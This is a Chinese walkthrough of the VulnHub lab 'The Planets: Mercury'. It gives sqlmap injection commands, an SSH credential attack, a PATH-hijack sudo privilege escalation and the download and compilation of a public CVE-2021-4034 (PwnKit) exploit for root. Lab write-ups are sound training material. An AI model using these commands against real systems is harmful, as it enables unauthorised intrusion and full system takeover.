Vulnhub項目:THE PLANETS: MERCURY

1、靶場地址

The Planets: Mercury ~ VulnHubThe Planets: Mercury, made by SirFlash. Download & walkthrough links are available.icon-default.png?t=N7T8https://vulnhub.com/entry/the-planets-mercury,544/

這好像是個系列的,關于星球系列,之前還做過一個地球的,有興趣的可以看看!Vulnhub項目:Earth_vulnhub earth-CSDN博客文章瀏覽閱讀714次。Vulnhub項目:Earth_vulnhub earthhttps://blog.csdn.net/weixin_43938645/article/details/130265310?spm=1001.2014.3001.5501

2、滲透過程

搞起!確認目標 56.165,本機 56.160,nmap 探測開放端口。

開放 22 和 8080 端口,訪問 8080,沒啥東西,那就掃個目錄看看?

只有個 robots.txt?

訪問一下,啥都沒有?

嘗試 index.html,發現了報錯提醒,有個新的路徑。

?訪問新路徑后發現了一張圖和兩個鏈接,隨便點一點觀察一下。

訪問 load a fact 后發現這塊的 id 有東西 。

?

經過幾次嘗試發現這塊應該有 sql 注入 。

打個單引號,果然,如下圖所示

?sqlmap 啟動,具體命令如下,基礎操作!?

sqlmap -u http://192.168.56.165:8080/mercuryfacts/1 --dbs --batch

sqlmap -u http://192.168.56.165:8080/mercuryfacts/1 -D mercury --tables --batch
sqlmap -u http://192.168.56.165:8080/mercuryfacts/1 -D mercury -T users --columns --batch

sqlmap -u http://192.168.56.165:8080/mercuryfacts/1 -D mercury -T users -C username,password --dump --batch

發現用戶名和密碼。用這些用戶名和密碼去嘗試 ssh,也可以用 hydra 去爆破 ssh。?

經過測試發現只有最后一個可以登上。

進入后,首先發現了 user_flag,還發現了個文件夾,里面有提示?

這兩個怎么看怎么像個用戶名和密碼,只不過密碼是base64 加密了

那就解密下下面的用戶,很好,出來了,下面去連接這個 linuxmaster 用戶,當然也可以之間在 webmaster 用戶那 su 一下?

找了一下,沒啥東西,那就提權一下。這里有兩種方式提權,首先介紹第一種,利用 sudo -l,進行環境變量提權。可以看看這個 sh 文件是怎么寫的。

他這是用 tail 命令去做了個操作,那可以自己做一個 tail 二進制程序,然后把它的環境變量設置一下,應用新的環境變量,用這個環境變量下的 tail 去執行這個 sh 文件。?

echo "/bin/bash" > tail

chmod 777 tail

export PATH=.:$PATH

sudo --preserve-env=PATH /usr/bin/check_syslog.sh

啪的一下,肉特root了,獲取了 root_flag。就很舒服!??

下面是第二種方式,利用 suid 去提權。輸入下面的命令去找具有 suid 的文件。?

find / -perm -4000 -type f 2>/dev/null

好巧不巧,發現了個這個,我以前文章有對這個 cve 進行分析CVE-2021-4034漏洞原理解析-CSDN博客文章瀏覽閱讀8k次,點贊5次,收藏14次。本篇文章主要分析了CVE-2021-4034漏洞,同時介紹了相關知識點以及使用方法,漏洞復現在前滲透測試(七)中體現,記錄自己學習過程。_cve-2021-4034https://blog.csdn.net/weixin_43938645/article/details/127924107?下載,打包,開啟 web 服務,讓靶機把這個 cve 下載到靶機上,然后解壓一下。

GitHub - berdav/CVE-2021-4034: CVE-2021-4034 1day

git clone到本地打包

tar -czvf?CVE-2021-4034.tar.gz CVE-2021-4034

python3 -m http.server 8099

靶機linuxmaster? ?wget一下,解壓,tar -xvf?CVE-2021-4034.tar.gz

?

那下面就簡單多了!!!?

進到這個文件夾下,make 一下?

生成了 cve-2021-4034,之間運行就可返回 root,提權成功!!!!?

這個 cve 用戶還是挺廣的,后面還有個類似的靶機,也是用這個 cve,當然還有其他的方式,正在做其他的方式提權,緩沖區溢出,搞起!

這個靶機算是用兩種方式拿下了,希望各位看官繼續關注后續文章,哈哈哈,請點贊!!哈哈!!

3、思路總結

接下來總結下思路,從 web 開始思路基本上差不多,用 sql 注入當做切入點,獲取用戶名和密碼,然后進行 ssh 連接,進入系統后,去發現相關文件。進一步深入提權,兩種方式,說不定還有更多方式,可以多嘗試嘗試,沒事,靶機么,隨便搞,又打不壞,大不了重裝!!!

堅持每天能做兩臺,更新兩篇文章,樸實無華的一天就這么度過了,還有不到一個月就得撤了,有點舍不得呢xd!!!!

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/bicheng/21765.shtml
繁體地址,請注明出處:http://hk.pswp.cn/bicheng/21765.shtml
英文地址,請注明出處:http://en.pswp.cn/bicheng/21765.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

滑動窗口最大值-力扣

在做這道題時,首先想到的解法是使用隊列來做,維護一個隊列,每次保存滑動窗口大小的長度,并判斷此時隊列中的最大值,但這樣做,在k的值較大時,出現了超時問題,代碼如下: c…

STM32-15-DMA

STM32-01-認識單片機 STM32-02-基礎知識 STM32-03-HAL庫 STM32-04-時鐘樹 STM32-05-SYSTEM文件夾 STM32-06-GPIO STM32-07-外部中斷 STM32-08-串口 STM32-09-IWDG和WWDG STM32-10-定時器 STM32-11-電容觸摸按鍵 STM32-12-OLED模塊 STM32-13-MPU STM32-14-FSMC_LCD 文章目錄 STM…

[原創][Delphi多線程]TThreadedQueue的經典使用案例.

[簡介] 常用網名: 豬頭三 出生日期: 1981.XX.XX QQ: 643439947 個人網站: 80x86匯編小站 https://www.x86asm.org 編程生涯: 2001年~至今[共22年] 職業生涯: 20年 開發語言: C/C、80x86ASM、PHP、Perl、Objective-C、Object Pascal、C#、Python 開發工具: Visual Studio、Delph…

悉數六大設計原則

悉數六大設計原則 目錄 悉數六大設計原則前言?誰發明了設計模式設計原則設計原則與設計模式的關系 單一職責什么是單一職責不遵循單一職責原則的設計遵循單一職責原則的設計單一職責的優點示例代碼: 里氏替換原則什么是里氏替換原則示例代碼:違反里氏替…

解讀信創產業根基,操作系統發展歷程

信創產業根基之一操作系統 操作系統是一個關鍵的控制程序,負責協調、管理和控制計算機硬件和軟件資源。作為硬件的首要軟件擴展,它位于裸機與用戶之間,充當了兩者之間的橋梁。通過其核心程序,操作系統高效地管理著系統中的各類資源…

static修飾變量和函數

static修飾的變量和函數只能在定義它的cpp源文件中使用,如果在頭文件中定義,則需要注意 在頭文件中定義static變量和static函數: 變量 如果在頭文件中定義了static變量,那么,所有包含這個頭文件的源文件都會定義自己…

vm-bhyve虛擬機安裝ubuntu22版本后進入grub無法啟動

問題:安裝ubuntu22版本后無法啟動 安裝好ubuntu22之后,重啟進入了grub模式,沒有自動啟動ubuntu 網上查了一下,這算一個通病。 問題解決 在grub模式下輸入boot命令: boot (lvm/ubuntu--vg-ubuntu--lv)/boot error: …

有哪些兼職軟件一天能賺幾十元?盤點十個能長期做下去的掙錢軟件

在當今這個信息泛濫的時代,眾人紛紛尋求迅速致富的捷徑。許多人在從事兼職或副業時,并不期望取得巨大的成就,只要每天能額外收入數十元,便已心滿意足。 今天,我將帶領大家深入探究,揭開那些隱藏在日常生活…

【小海實習日記】Git使用規范

1.Git使用流程 1.1 從master分支拉一個分支,命名要符合規范且清晰。 1.2 commit到本地,push 到遠端。 1.3 在Gitlab創建MR,選擇develp分支。 1.4 如果要修改的話,先把Gitlab上的MR修改為Draft(修改態),然后在本地修改代…

Dubbo中的Invoker與Exporter機制詳解

Dubbo作為一款成熟的高性能、輕量級的Java RPC框架,其核心機制之一便是Invoker與Exporter機制,它們在服務提供端和服務消費端扮演著至關重要的角色,是實現服務調用和管理的基礎。下面將詳細解析這兩個核心組件的工作原理及其在Dubbo框架中的作…

9.1.1 簡述目標檢測領域中的單階段模型和兩階段模型的性能差異及其原因

9.1目標檢測 場景描述 目標檢測(Object Detection)任務是計算機視覺中極為重要的基礎問題,也是解決實例分割(Instance Segmentation)、場景理解(Scene Understanding)、目標跟蹤(Ob…

詳解 Spark SQL 代碼開發之用戶自定義函數

一、UDF 一進一出函數 /**語法:SparkSession.udf.register(func_name: String, op: T > K) */ object TestSparkSqlUdf {def main(args: Array[String]): Unit {// 創建 sparksql 環境對象val conf new SparkConf().setMaster("local[*]").setAppNam…

subline text3安裝numpy,scipy,matplotlib,pandas,sklearn,ipynb

1,numpy(基礎數值算法) 安裝,要是在cmd直接安裝到最后會報錯, import numpy as np ModuleNotFoundError: No module named numpy 直接進入python環境,輸入python -m pip install numpy就不會報錯…

【SringBoot項目中MyBatis-Plus多數據源應用實踐】

文章目錄 前言 一、Mybatis-Plus是什么? 二、多數據源是什么? 三、使用步驟 1. 新建一個SpringBoot項目 2. 引入必要的MyBatis架包 3. 新建兩個數據庫及兩張表 3.3.1 新建數據庫:DB_A,并創建一張數據表alarm_kind,以及…

云端數據提取:安全、高效地利用無限資源

在當今的大數據時代,企業和組織越來越依賴于云平臺存儲和處理海量數據。然而,隨著數據的指數級增長,數據的安全性和高效的數據處理成為了企業最為關心的議題之一。本文將探討云端數據安全的重要性,并提出一套既高效又安全的數據提…

淺測 長亭雷池 WAF “動態防護”

本文首發于 Anyeの小站 前言 雷池 WAF 社區版的更新速度是真快啊,幾乎一周一個小版本,倆月一個大版本,攻城獅們真的狠啊,沒法測了。 廢話不多說,前兩天看到了 這篇文章,對雷池的“動態防護”功能挺感興趣…

Android應用的基本構造及威脅(apk)

目錄 APK文件是什么 apk文件解壓后的目錄結構 apk文件的存儲位置

去掉el-table表頭右側類名是gutter,width=17px的空白區域(包括表頭樣式及表格奇偶行樣式和表格自動滾動)

代碼如下&#xff1a; <el-table:data"tableData"ref"scroll_Table":header-cell-style"getRowClass":cell-style"styleBack"height"350px"style"width: 100%"><el-table-column prop"id" l…

Scrum團隊在迭代中如何處理計劃外的工作

認為 Scrum 團隊不做計劃其實是一個誤區&#xff0c;實際上很多 Scrum 團隊在沖刺計劃會議以及在細化工作項時均會進行詳細規劃。此外&#xff0c;他們還會創建一個路線圖&#xff0c;以便顯示他們在多個沖刺中的計劃。 Scrum 團隊需要經常進行計劃&#xff0c;以便在不斷變化…

linux學習:進程

目錄 例子1 獲取當前進程的進程標識符 例子2 創建一個新的子進程 例子3 展示了父進程和子進程的進程標識符 例子4 區分父進程和子進程 例子5 區分父進程和子進程的行為 例子6 比較進程標識符來區分父進程和子進程 例子7 子進程如何修改一個變量&…